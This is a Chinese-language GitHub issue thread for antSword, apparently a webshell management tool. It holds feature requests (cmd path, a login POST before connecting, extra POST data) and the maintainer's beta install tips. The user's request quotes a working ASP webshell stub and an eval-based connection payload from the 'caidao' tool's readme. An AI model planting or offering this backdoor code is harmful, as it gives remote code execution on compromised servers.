### ISSUE TITLE
增加终端设置cmd路径功能

### ISSUE THREAD

**Issue by H1d3r** [antoor/antSword#58]
1、加个菜刀那种setp 设置cmd路径的，防止asp没system32下面 cmd权限；
2、可以加个需要先post之类请求的那种，如菜刀中的<post>http://localhost/login.php</post><data>user=a&pass=b</data>，这样可以避免每次都要弄cookie；
3、菜刀中有个可配置项<O>type=xxx&list</O> 添加额外附加提交的数据，菜刀readme介绍为
`如ASP的新服务端是这样的：
	<%
	Set o = Server.CreateObject("ScriptControl")
	o.language = "vbscript"
	o.addcode(Request("SC"))
	o.run "ff",Server,Response,Request,Application,Session,Error
	%>
	那么，菜刀在配置处填入：
	<O>SC=function+ff(Server,Response,Request,Application,Session,Error):eval(request("pass")):end+function</O>
	然后以密码pass来连接即可。`

btw，2.0什么时候能够出个测试版，之前说6月6号可能出，等了好长时间还是没看到。只好自己改了改1.3的

**Comment by antoor** [comment]
1. 好的，这个已经在计划列表内
2. 登陆验证功能目前在编写中 #57 
3. 推测此功能为附加的HTTP数据，将计划在 #57 中实现

> 最近挺忙的，其实2.0已经可以使用了，但是这个使用的方式仅仅只有研究过的同学才会使用。
> 我们在慢慢完善，也在等待一个适当的时机发布。**我们相信好的东西是需要经过时间的磨练的**

tip: 
``` sh
$ wget https://github.com/antoor/antSword/archive/v2.0-beta.zip
$ unzip v2.0-beta.zip
$ npm install -g asar
$ asar p antSword app.asar
$ cp app.asar /path/to/antSword.app/Content/Resources/
```

![感谢支持](http://hbimg.b0.upaiyun.com/31854f67e997f7f5ad159c7d0aa42a4720a3d448efc0-5H14FN_fw658)

**Comment by H1d3r** [comment]
2.0-beta 在windows下貌似有问题，es的界面能显示 但是antsword的布局全部没显示 @antoor

**Comment by antoor** [comment]
@H1d3r 忘了说了，2.0是不需要打包了的～ 因为数据存储全部转移到代码同目录，所以asar打包方式会导致错误。
所以，再给个不完美的tips：
```sh
$ wget https://github.com/antoor/antSword/archive/v2.0-beta.zip
$ unzip v2.0-beta.zip
$ mv antSword /path/to/antSword.app/Content/Resource/app
```

![](http://hbimg.b0.upaiyun.com/8f0355999f4f61d2b379aee7f09d9f99213eaa9c14ad9-2PeDy9_fw658)

**Comment by H1d3r** [comment]
@antoor 2.0-beta版本的 config.js 会报 process.env.AS_WORKDIR 未定义错误 估计是环境问题。  
我还是坐等2.0公开版把。
